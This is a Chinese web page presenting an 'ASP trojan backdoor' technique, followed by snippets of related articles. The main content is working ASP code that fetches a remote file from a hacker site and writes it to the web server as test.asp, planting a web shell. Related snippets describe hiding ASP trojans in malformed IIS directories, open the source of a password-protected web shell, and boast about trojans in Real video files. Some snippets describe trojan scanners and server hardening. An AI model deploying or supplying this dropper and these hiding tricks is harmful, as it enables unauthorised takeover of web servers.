ASP木马后门新思路

<%

Function GetPage(url)

dim Retrieval

Set Retrieval = createObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False ', "", ""

.Send

GetPage = BytesToBstr(.ResponseBody)

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(body)

dim objstream

set objstream = Server.createObject("adodb.stream")

objstream.Type = 1

objstream.Mode =3

objstream.Open

objstream.Write body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = "GB2312"

BytesToBstr = objstream.ReadText

objstream.Close

set objstream = nothing

End Function

on error resume next

Url="http://www.heibai.org/hacker/daemon.txt"

response.write "开始取得远程代码........"

wstr = GetPage(Url)

Set fs=Server.createObject("Scripting.FileSystemObject")

Set CrFi=fs.createTextFile(server.MapPath("./")&"\test.asp")

Crfi.Writeline(wstr)

set CrFi=nothing

set fs=nothing

response.write "...<font color=red>生成test.asp文件成功</font>"

%>

(0)

相关推荐

  • ASP木马后门新思路

    <% Function GetPage(url) dim Retrieval Set Retrieval = createObject("Microsoft.XMLHTTP") With Retrieval .Open "Get", url, False ', "", "" .Send GetPage = BytesToBstr(.ResponseBody) End With Set Retrieval = Nothin

  • 隐藏ASP木马后门的两种方法

    1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

  • 在线扫描探测检查asp站点木马后门的程序

    复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置登陆密码,使用前务必修改此密码 PASSWORD = "www.pifoo.com" '其他扫描设置 DimFileExt = "asp,cer,asa,cdx"  '文件类型扩展名列表,不在此列表的将不被扫描 maxfilesize= 51200 '500K,超过此文件大小的文件(一般不是木马)

  • 一款不错的asp木马 黑色界面

    <% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617"                           '密码 mName="BY:.尐飛"           '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责"       '版权 Server.ScriptTimeout=9

  • 淘特ASP木马扫描器的代码

    +-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序.系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了.目前可以查杀所有流行的ASP木马程序. 系统提供了全站扫描.按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描.扫描过程,系统会记录

  • 雷客图ASP站长安全助手的ASP木马查找功能

    可以在线查找空间里的asp木马 复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置密码 PASSWORD = "jb51net" dim Report if request.QueryString("act")="login" then     if request.Form("pwd") = PASSWO

  • 雷客图 站长安全助手 vbs版代码(asp 木马查找)

    均在命令行下使用 AntiIframe.vbs #该脚本是批量挂马程序的逆向,用于批量清除被添加到文件中的恶意代码.记事本打开文件可以修改Pattern参数指定要处理的文件名,文件名之间用|隔开(也支持vbs正则表达式).由于要修改文件,请谨慎的使用(最好先备份文件) #用法: CScript AntiIframe.vbs [处理的路径] [包含清除内容的文件] #例子: CScript AntiIframe.vbs d:\Web d:\lake2.txt -------------------

  • 一个查ASP木马的小东东

    关于查ASP木马的程序,记得半年前在八进制发了一个测试版(具体的URL:http://forum.eviloctal.com/read-htm-tid-19665.html),得到很多朋友的指导,学到了很多东西,非常感谢他们.现在我发的这个升级版,修补了以前的bug,加入了对一些组件写文件函数的检测,更加趋于完美了,个人认为想绕过去有点难度哦. 这回的默认密码是security 当然啦,哈哈,lake2"比武招亲",欢迎各位朋友提出绕过检测的马马来,一经证实,lake2将把我自己写的某

  • 防止ASP木马在服务器上运行

    如果您的服务器正在受ASP木马的困扰,那么希望这篇文章能帮您解决您所面临的问题. 目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作. 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_ChangeName 自己以后调用的时候

  • 在Real影片中放木马后门

    在Real影片中放木马后门.遇到类是情况希望大家注意 经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉!  在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,安装了一个这样的小木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事. 使用某个工具来修改影片的剪辑信息,

随机推荐